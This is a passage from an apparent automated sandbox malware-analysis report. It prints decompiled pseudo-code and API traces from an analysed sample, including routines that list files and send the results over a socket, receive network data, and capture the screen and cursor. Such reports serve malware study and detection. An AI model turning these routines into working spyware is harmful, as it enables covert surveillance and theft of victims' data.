                                                                      				}
                                                                      			}
                                                                      0x00416562
                                                                      0x00416567
                                                                      0x0041656e
                                                                      0x00416577
                                                                      0x00416579
                                                                      0x0041657e
                                                                      0x00416580
                                                                      0x0041659d
                                                                      0x004165a6
                                                                      0x004165a6
                                                                      0x00416608
                                                                      0x00416613
                                                                      0x00416615
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004165bf
                                                                      0x004165c4
                                                                      0x004165cb
                                                                      0x004165d4
                                                                      0x004165d6
                                                                      0x004165db
                                                                      0x004165dd
                                                                      0x004165fa
                                                                      0x00416603
                                                                      0x00416603
                                                                      0x004165dd
                                                                      0x00000000
                                                                      0x00416353
                                                                      0x00416353
                                                                      0x00416356
                                                                      0x0041636d
                                                                      0x00416390
                                                                      0x0041639a
                                                                      0x004163a3
                                                                      0x004163ac
                                                                      0x004163b5
                                                                      0x004163ba
                                                                      0x004163c0
                                                                      0x004163c5
                                                                      0x004163c7
                                                                      0x004163db
                                                                      0x004163e0
                                                                      0x004163e3
                                                                      0x004163ec
                                                                      0x00416401
                                                                      0x0041640a
                                                                      0x00416430
                                                                      0x00416439
                                                                      0x00416439
                                                                      0x0041644f
                                                                      0x0041645c
                                                                      0x004164b6
                                                                      0x004164ba
                                                                      0x004164c0
                                                                      0x004164c7
                                                                      0x004164d0
                                                                      0x004164d9
                                                                      0x004164e5
                                                                      0x004164f1
                                                                      0x004164fa
                                                                      0x004164fa
                                                                      0x00416503
                                                                      0x0041650c
                                                                      0x0041650c
                                                                      0x00416644
                                                                      0x00416648
                                                                      0x00416654
                                                                      0x00416667
                                                                      0x00416667

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00416545
                                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00416611
                                                                        • Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Find$CreateFirstNext
                                                                      • String ID:
                                                                      • API String ID: 341183262-0
                                                                      • Opcode ID: e5c511b54431d6af09c301084ec25070c7bfddbcb7f6eaabd03b5b2420e2744b
                                                                      • Instruction ID: a26aadaeba453cd238509f59d481c7992e227e501a03fe21758d02ac29eb64a2
                                                                      • Opcode Fuzzy Hash: e5c511b54431d6af09c301084ec25070c7bfddbcb7f6eaabd03b5b2420e2744b
                                                                      • Instruction Fuzzy Hash: 558153315083455AC314FB22CC66EEF73A9AF91348F40493FF546671E2EF38A949C69A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0040620E(char _a4) {
                                                                      				void* _v16;
                                                                      				struct _WIN32_FIND_DATAW _v596;
                                                                      				char _v620;
                                                                      				void* _v632;
                                                                      				char _v644;
                                                                      				void* _v648;
                                                                      				char _v652;
                                                                      				void* _v656;
                                                                      				char _v668;
                                                                      				char _v676;
                                                                      				void* _v700;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				int _t29;
                                                                      				void* _t34;
                                                                      				void* _t49;
                                                                      				void* _t71;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t77;
                                                                      
                                                                      				_t74 = FindFirstFileW(E00401EC4( &_a4),  &_v596);
                                                                      				_t80 = _t74 - 0xffffffff;
                                                                      				if(_t74 != 0xffffffff) {
                                                                      					E0040209F(_t49,  &_v668);
                                                                      					E0040413E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
                                                                      					_t72 = ".";
                                                                      					_t29 = E004078C9(__eflags);
                                                                      					_t50 = _t29;
                                                                      					E00401EC9();
                                                                      					__eflags = _t29;
                                                                      					if(__eflags != 0) {
                                                                      						E00401FA2( &_v676, ".", _t74, E00402077(_t50,  &_v644, ".", 0x250, __eflags,  &_v596, 0x250));
                                                                      						L5:
                                                                      						E00401F98();
                                                                      					}
                                                                      					__eflags = FindNextFileW(_t74,  &_v596);
                                                                      					if(__eflags != 0) {
                                                                      						_t34 = E00402077(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
                                                                      						_t72 =  &_v676;
                                                                      						E00401FA2( &_v676,  &_v676, _t74, E004078D8(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
                                                                      						E00401F98();
                                                                      						goto L5;
                                                                      					}
                                                                      					E004020B6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
                                                                      					_push(0x50);
                                                                      					E00404A78(0x46e328, _t72, __eflags);
                                                                      					E00401F98();
                                                                      				} else {
                                                                      					E00418445(_t49, _t77 - 0x18,  &_a4);
                                                                      					_push(0x54);
                                                                      					E00404A78(0x46e328,  &_a4, _t80);
                                                                      				}
                                                                      				return E00401EC9();
                                                                      			}
                                                                      0x0040622f
                                                                      0x00406231
                                                                      0x00406234
                                                                      0x0040625c
                                                                      0x0040626d
                                                                      0x00406272
                                                                      0x00406279
                                                                      0x00406282
                                                                      0x00406284
                                                                      0x0040628e
                                                                      0x00406290
                                                                      0x004062a6
                                                                      0x004062e6
                                                                      0x004062e6
                                                                      0x004062e6
                                                                      0x004062f7
                                                                      0x004062f9
                                                                      0x004062bb
                                                                      0x004062c1
                                                                      0x004062d4
                                                                      0x004062dd
                                                                      0x00000000
                                                                      0x004062e2
                                                                      0x00406305
                                                                      0x0040630a
                                                                      0x00406311
                                                                      0x0040631a
                                                                      0x00406236
                                                                      0x00406242
                                                                      0x00406247
                                                                      0x0040624e
                                                                      0x0040624e
                                                                      0x00406334

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,-00000001), ref: 00406229
                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,-00000001), ref: 004062F1
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFind$FirstNextsend
                                                                      • String ID:
                                                                      • API String ID: 4113138495-0
                                                                      • Opcode ID: fcdacda9fe9f4e786d16d534c6280b269c7ba8401a346d0249c7ae28d711531f
                                                                      • Instruction ID: 9958a12bfbb4ba08b4aca9fca0fc78b401751e1e3a6f6c2f4e9dda6e764b097a
                                                                      • Opcode Fuzzy Hash: fcdacda9fe9f4e786d16d534c6280b269c7ba8401a346d0249c7ae28d711531f
                                                                      • Instruction Fuzzy Hash: BF2173315043415BC714FB61DC99DAFB3A8AF91358F40093FB586621E2EF3CAA09C65B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E0044E084(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				short _v248;
                                                                      				void* __ebp;
                                                                      				signed int _t16;
                                                                      				signed int _t22;
                                                                      				void* _t24;
                                                                      				void* _t31;
                                                                      				void* _t35;
                                                                      				signed int* _t50;
                                                                      				int _t53;
                                                                      				signed int _t54;
                                                                      
                                                                      				_t16 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t16 ^ _t54;
                                                                      				_t35 = E00444255(__ebx, __ecx, __edx);
                                                                      				_t50 =  *(E00444255(_t35, __ecx, __edx) + 0x34c);
                                                                      				_t53 = E0044E15C(_a4);
                                                                      				asm("sbb ecx, ecx");
                                                                      				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                      				if(_t22 != 0) {
                                                                      					_t24 = E0044F785(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                                                                      					if(_t24 != 0) {
                                                                      						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                                                                      							_t31 = E0044F785(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                                                                      							if(_t31 == 0) {
                                                                      								_push(_t50);
                                                                      								_push(_t31);
                                                                      								goto L9;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if( *(_t35 + 0x60) != _t24) {
                                                                      							L10:
                                                                      							 *_t50 =  *_t50 | 0x00000004;
                                                                      							_t50[1] = _t53;
                                                                      							_t50[2] = _t53;
                                                                      						} else {
                                                                      							_push(_t50);
                                                                      							_push(1);
                                                                      							L9:
                                                                      							_push(_t53);
                                                                      							if(E0044E2B4(_t35) != 0) {
                                                                      								goto L10;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					 *_t50 =  *_t50 & _t22;
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t54);
                                                                      			}
                                                                      0x0044e08f
                                                                      0x0044e096
                                                                      0x0044e0a4
                                                                      0x0044e0ac
                                                                      0x0044e0bb
                                                                      0x0044e0c7
                                                                      0x0044e0d8
                                                                      0x0044e0e0
                                                                      0x0044e0f1
                                                                      0x0044e0fa
                                                                      0x0044e10a
                                                                      0x0044e11c
                                                                      0x0044e125
                                                                      0x0044e127
                                                                      0x0044e128
                                                                      0x00000000
                                                                      0x0044e128
                                                                      0x0044e125
                                                                      0x0044e0fc
                                                                      0x0044e0ff
                                                                      0x0044e136
                                                                      0x0044e136
                                                                      0x0044e139
                                                                      0x0044e13c
                                                                      0x0044e101
                                                                      0x0044e101
                                                                      0x0044e102
                                                                      0x0044e129
                                                                      0x0044e129
                                                                      0x0044e134
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e134
                                                                      0x0044e0ff
                                                                      0x0044e0e2
                                                                      0x0044e0e2
                                                                      0x0044e0e4
                                                                      0x0044e159

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044E0D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                      • String ID:
                                                                      • API String ID: 1663032902-0
                                                                      • Opcode ID: a7991556a60d0f52b05dfba32f3594f02ecea51a4dfe7727653c54649b7cd0d2
                                                                      • Instruction ID: 7c3f0c6a3f856400e3624027ed18d4a48bc7be73c297c67ae2bfd224e57694f9
                                                                      • Opcode Fuzzy Hash: a7991556a60d0f52b05dfba32f3594f02ecea51a4dfe7727653c54649b7cd0d2
                                                                      • Instruction Fuzzy Hash: 262183729402069BFB249E2ADC42BBB73A8FF44314F1001BBF905D6241EB789D45C759
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
			E0044E2B4(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);                                                                          // 0x0044e2b9
				_t8 = E00444255(__ebx, _t16, _t22);                                                   // 0x0044e2bc
				_t27 = _a4;                                                                           // 0x0044e2c1
				_t24 = _t8;                                                                           // 0x0044e2c4
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {      // 0x0044e2e8
					if(_t27 == _v8 || _a8 == 0) {                                                     // 0x0044e2f1
						L7:                                                                           // 0x0044e31b
						_t12 = 1;                                                                     // 0x0044e31d
					} else {                                                                          // 0x0044e2f9
						_t29 =  *((intOrPtr*)(_t24 + 0x50));                                          // 0x0044e2f9
						_t20 = _t29 + 2;                                                              // 0x0044e2fc
						do {                                                                          // 0x0044e2ff
							_t13 =  *_t29;                                                            // 0x0044e2ff
							_t29 = _t29 + 2;                                                          // 0x0044e302
						} while (_t13 != 0);                                                          // 0x0044e305
						if(E0044DE08( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {            // 0x0044e319
							goto L1;                                                                  // 0x00000000
						} else {                                                                      // 0x00000000
							goto L7;                                                                  // 0x00000000
						}                                                                             // 0x00000000
					}                                                                                 // 0x0044e319
				} else {                                                                              // 0x0044e2ea
					L1:                                                                               // 0x0044e2ea
					_t12 = 0;                                                                         // 0x0044e2ea
				}                                                                                     // 0x0044e2ea
				return _t12;                                                                          // 0x0044e323
			}

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044E052,00000000,00000000,?), ref: 0044E2E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                      • String ID:
                                                                      • API String ID: 2692324296-0
                                                                      • Opcode ID: c3a4badbf8709a1aa90c87c041315b104450e781e03cffe67df0b7836d74f200
                                                                      • Instruction ID: 96046800f1bbf67de7a36a5e7d3cd6df397acbff32d2288606bd6d82971d54d4
                                                                      • Opcode Fuzzy Hash: c3a4badbf8709a1aa90c87c041315b104450e781e03cffe67df0b7836d74f200
                                                                      • Instruction Fuzzy Hash: 6AF0F932910126FBFB285A67C8057BB7768FB40755F1404AEFC19A3640EA79BD41C6D8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
			E0044DDA7(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00444255(_t17, __ecx, __edx);                                                 // 0x0044ddb4
				_t25 = 2;                                                                             // 0x0044ddba
				_t20 =  *((intOrPtr*)(_t27 + 0x50));                                                  // 0x0044ddbb
				_t26 = _t20 + 2;                                                                      // 0x0044ddbe
				do {                                                                                  // 0x0044ddc1
					_t11 =  *_t20;                                                                    // 0x0044ddc1
					_t20 = _t20 + _t25;                                                               // 0x0044ddc4
				} while (_t11 != 0);                                                                  // 0x0044ddc6
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;                                   // 0x0044ddd4
				 *(_t27 + 0x60) = _t13;                                                               // 0x0044ddd7
				if(_t13 == 0) {                                                                       // 0x0044dddc
					_t25 = E0044DE08( *((intOrPtr*)(_t27 + 0x50)));                                   // 0x0044dde7
				}                                                                                     // 0x0044dde7
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;                                                  // 0x0044ddf0
				EnumSystemLocalesW(E0044E084, 1);                                                     // 0x0044ddf3
				_t15 = _a4;                                                                           // 0x0044ddf9
				if(( *_t15 & 0x00000004) == 0) {                                                      // 0x0044ddff
					 *_t15 = 0;                                                                       // 0x0044de01
					return _t15;                                                                      // 0x00000000
				}                                                                                     // 0x0044de01
				return _t15;                                                                          // 0x0044de07
			}

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • EnumSystemLocalesW.KERNEL32(0044E084,00000001,?,?,00440B2C,?,0044E425,00440B2C,?,?,?,?,?,00440B2C,?,?), ref: 0044DDF3
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                      • String ID:
                                                                      • API String ID: 1084509184-0
                                                                      • Opcode ID: 8819b3b6a967917b020e32d9d569d1ed6ea8f6a66b8dd80f38f91ffa60e6afdf
                                                                      • Instruction ID: 72a72f069abfd75914a56d9b38c076994bd77232498321b5852f207a1f47c94e
                                                                      • Opcode Fuzzy Hash: 8819b3b6a967917b020e32d9d569d1ed6ea8f6a66b8dd80f38f91ffa60e6afdf
                                                                      • Instruction Fuzzy Hash: 71F022366007045FEB145F3A9881B6B7B94FF8036CF14442EFA058B640D6B5AC42C688
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
			E00444444(void* __eflags) {
				int _t15;
				void* _t28;

				E00431740(0x469360, 0xc);                                                             // 0x0044444b
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;                                       // 0x00444450
				E00441948( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));                                // 0x00444459
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;                                             // 0x0044445f
				 *0x46d728 = E0043F249( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));  // 0x00444470
				_t15 = EnumSystemLocalesW(E004443FE, 1);                                              // 0x0044447c
				_push(0x20);                                                                          // 0x0044448c
				asm("ror eax, cl");                                                                   // 0x00444493
				 *0x46d728 = 0 ^  *0x46c00c;                                                          // 0x0044449b
				 *(_t28 - 0x1c) = _t15;                                                               // 0x004444a0
				 *(_t28 - 4) = 0xfffffffe;                                                            // 0x004444a3
				E004444BC();                                                                          // 0x004444aa
				return E00431786();                                                                   // 0x004444b6
			}

                                                                      APIs
                                                                        • Part of subcall function 00441948: EnterCriticalSection.KERNEL32(-0046D510,?,0043F09B,00000000,004691B8,0000000C,0043F056,0000000A,?,?,00441BE6,0000000A,?,0044430A,00000001,00000364), ref: 00441957
                                                                      • EnumSystemLocalesW.KERNEL32(004443FE,00000001,00469360,0000000C), ref: 0044447C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                      • String ID:
                                                                      • API String ID: 1272433827-0
                                                                      • Opcode ID: efa6df1383695662a50c9639d08f6bc8c9312fa48d89572b8e540a406ff5fdad
                                                                      • Instruction ID: 2d3b2032a2fe1bb3eefe2d1947f6df9e0cb2519fbdf89481f4df6945a9c4bbd3
                                                                      • Opcode Fuzzy Hash: efa6df1383695662a50c9639d08f6bc8c9312fa48d89572b8e540a406ff5fdad
                                                                      • Instruction Fuzzy Hash: D5F0F471A50204EFD710EF75D846B5D77E0EB08725F10516AF410DB2A1D7B949848B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
			E0044DCC1(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00444255(_t14, __ecx, __edx);                                                 // 0x0044dccd
				_t16 =  *((intOrPtr*)(_t20 + 0x54));                                                  // 0x0044dcd1
				_t22 = _t16 + 2;                                                                      // 0x0044dcd4
				do {                                                                                  // 0x0044dcd7
					_t9 =  *_t16;                                                                     // 0x0044dcd7
					_t16 = _t16 + 2;                                                                  // 0x0044dcda
				} while (_t9 != 0);                                                                   // 0x0044dcdd
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;                        // 0x0044dcf5
				EnumSystemLocalesW(0x44dc18, 1);                                                      // 0x0044dcf8
				_t13 = _a4;                                                                           // 0x0044dcfe
				if(( *_t13 & 0x00000004) == 0) {                                                      // 0x0044dd04
					 *_t13 = 0;                                                                       // 0x0044dd06
					return _t13;                                                                      // 0x00000000
				}                                                                                     // 0x0044dd06
				return _t13;                                                                          // 0x0044dd0b
			}

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • EnumSystemLocalesW.KERNEL32(0044DC18,00000001,?,?,?,0044E483,00440B2C,?,?,?,?,?,00440B2C,?,?,?), ref: 0044DCF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                      • String ID:
                                                                      • API String ID: 1084509184-0
                                                                      • Opcode ID: 3b890b326ee7e83ac880baec3d7a5bf8e0390f8fa7c287892454aa51542b554b
                                                                      • Instruction ID: 0890d784007e13cafcb2babffbe114836c7bd704c93bbb15fe5661a1cd062d96
                                                                      • Opcode Fuzzy Hash: 3b890b326ee7e83ac880baec3d7a5bf8e0390f8fa7c287892454aa51542b554b
                                                                      • Instruction Fuzzy Hash: 6CF0E53670020567DB04AF35E84576A7F94FFC2759F46406EEA0A8B291C6B99882C794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
			E0040D39C(void* __ecx) {
				char _v8;
				void* __ebp;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t15;

				_push(__ecx);                                                                         // 0x0040d39f
				_t13 = __ecx;                                                                         // 0x0040d3a6
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);                                                // 0x0040d3b0
				E00402053(_t8, _t13, _t11, _t15,  &_v8);                                              // 0x0040d3bc
				return _t13;                                                                          // 0x0040d3c7
			}

                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00412A8C,0046E260,0046E63C,0046E260,00000000,0046E260,00000000,0046E260,3.5.1 Pro), ref: 0040D3B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 2dcf0cd1f6bceb71ca7a6520eb17d8190ac4801879e7607fc993522ebe44b203
                                                                      • Instruction ID: 8a77a34170e387ec3e25abbcec71795f19ebc393574df2c8955e107f55d06eb4
                                                                      • Opcode Fuzzy Hash: 2dcf0cd1f6bceb71ca7a6520eb17d8190ac4801879e7607fc993522ebe44b203
                                                                      • Instruction Fuzzy Hash: CFD05B3074431C77D51096859C0AFAB779CD701B56F0001A6BA04D72C0D9E15E0087D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: recv
                                                                      • String ID:
                                                                      • API String ID: 1507349165-0
                                                                      • Opcode ID: 945e8bcceedc8670f2f0c35a89d4ed3830837b1f733c7902278b10ce8af6a4d1
                                                                      • Instruction ID: 177bad63f6a8a700af5d27124bba5d21cb8f162e0f35cba8ec6e16b001b6a0f6
                                                                      • Opcode Fuzzy Hash: 945e8bcceedc8670f2f0c35a89d4ed3830837b1f733c7902278b10ce8af6a4d1
                                                                      • Instruction Fuzzy Hash: 46B09279118302FFCA150BA0DC0887A7EA6EBC8785B00892CF146411B0C636C490AB26
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0041578F(void* __ecx, signed int __edx, void* __eflags) {
                                                                      				signed int _v16;
                                                                      				signed int _v36;
                                                                      				struct _ICONINFO _v128;
                                                                      				signed int _v146;
                                                                      				signed int _v148;
                                                                      				char _v149;
                                                                      				char _v152;
                                                                      				long _v156;
                                                                      				void* _v168;
                                                                      				struct tagCURSORINFO _v172;
                                                                      				int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				int _v196;
                                                                      				void* _v200;
                                                                      				void* _v224;
                                                                      				intOrPtr _v228;
                                                                      				char _v233;
                                                                      				char _v236;
                                                                      				struct HDC__* _v240;
                                                                      				void* _v242;
                                                                      				struct HDC__* _v244;
                                                                      				intOrPtr _v246;
                                                                      				char _v248;
                                                                      				intOrPtr _v250;
                                                                      				signed int _v252;
                                                                      				char _v256;
                                                                      				char _v260;
                                                                      				char _v268;
                                                                      				struct HDC__* _v272;
                                                                      				void* _v288;
                                                                      				void* _v292;
                                                                      				void* _v304;
                                                                      				struct HDC__* _v312;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				int _t107;
                                                                      				void* _t109;
                                                                      				void* _t113;
                                                                      				int _t120;
                                                                      				void* _t121;
                                                                      				signed char _t133;
                                                                      				long _t139;
                                                                      				void* _t140;
                                                                      				int _t142;
                                                                      				void* _t150;
                                                                      				void* _t179;
                                                                      				void* _t181;
                                                                      				void* _t187;
                                                                      				void* _t196;
                                                                      				void* _t215;
                                                                      				signed int _t217;
                                                                      				int _t218;
                                                                      				void* _t219;
                                                                      				struct HDC__* _t223;
                                                                      				struct tagBITMAPINFO* _t225;
                                                                      				void* _t226;
                                                                      				int _t232;
                                                                      				struct HDC__* _t234;
                                                                      
                                                                      				_t216 = __edx;
                                                                      				_v149 = __edx;
                                                                      				_t187 = __ecx;
                                                                      				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                      				_v172.hCursor = _t223;
                                                                      				_t234 = CreateCompatibleDC(_t223);
                                                                      				_t218 = E00415BE5( *((intOrPtr*)(0x46dd68 + _v16 * 4)));
                                                                      				_v156 = _t218;
                                                                      				_t107 = E00415C2F( *((intOrPtr*)(0x46dd68 + _v16 * 4)));
                                                                      				_v176 = _t107;
                                                                      				if(_t218 != 0 || _t107 != 0) {
                                                                      					_t219 = CreateCompatibleBitmap(_t223, _t218, _t107);
                                                                      					_v172.hCursor = _t219;
                                                                      					__eflags = _t219;
                                                                      					if(_t219 != 0) {
                                                                      						_t109 = SelectObject(_t234, _t219);
                                                                      						__eflags = _t109;
                                                                      						if(_t109 != 0) {
                                                                      							_t216 =  &_v184;
                                                                      							_v184 = _v184 & 0x00000000;
                                                                      							_v180 = _v180 & 0x00000000;
                                                                      							E00415C70( *((intOrPtr*)(0x46dd68 + _v36 * 4)),  &_v184);
                                                                      							_t113 = StretchBlt(_t234, 0, 0, _v176, _v196, _t223, _v184, _v180, _v176, _v196, 0xcc0020);
                                                                      							__eflags = _t113;
                                                                      							if(_t113 == 0) {
                                                                      								goto L7;
                                                                      							}
                                                                      							__eflags = _v233;
                                                                      							if(_v233 != 0) {
                                                                      								_v172.cbSize = 0x14;
                                                                      								_t179 = GetCursorInfo( &_v172);
                                                                      								__eflags = _t179;
                                                                      								if(_t179 != 0) {
                                                                      									_t181 = GetIconInfo(_v172.hCursor,  &_v128);
                                                                      									__eflags = _t181;
                                                                      									if(_t181 != 0) {
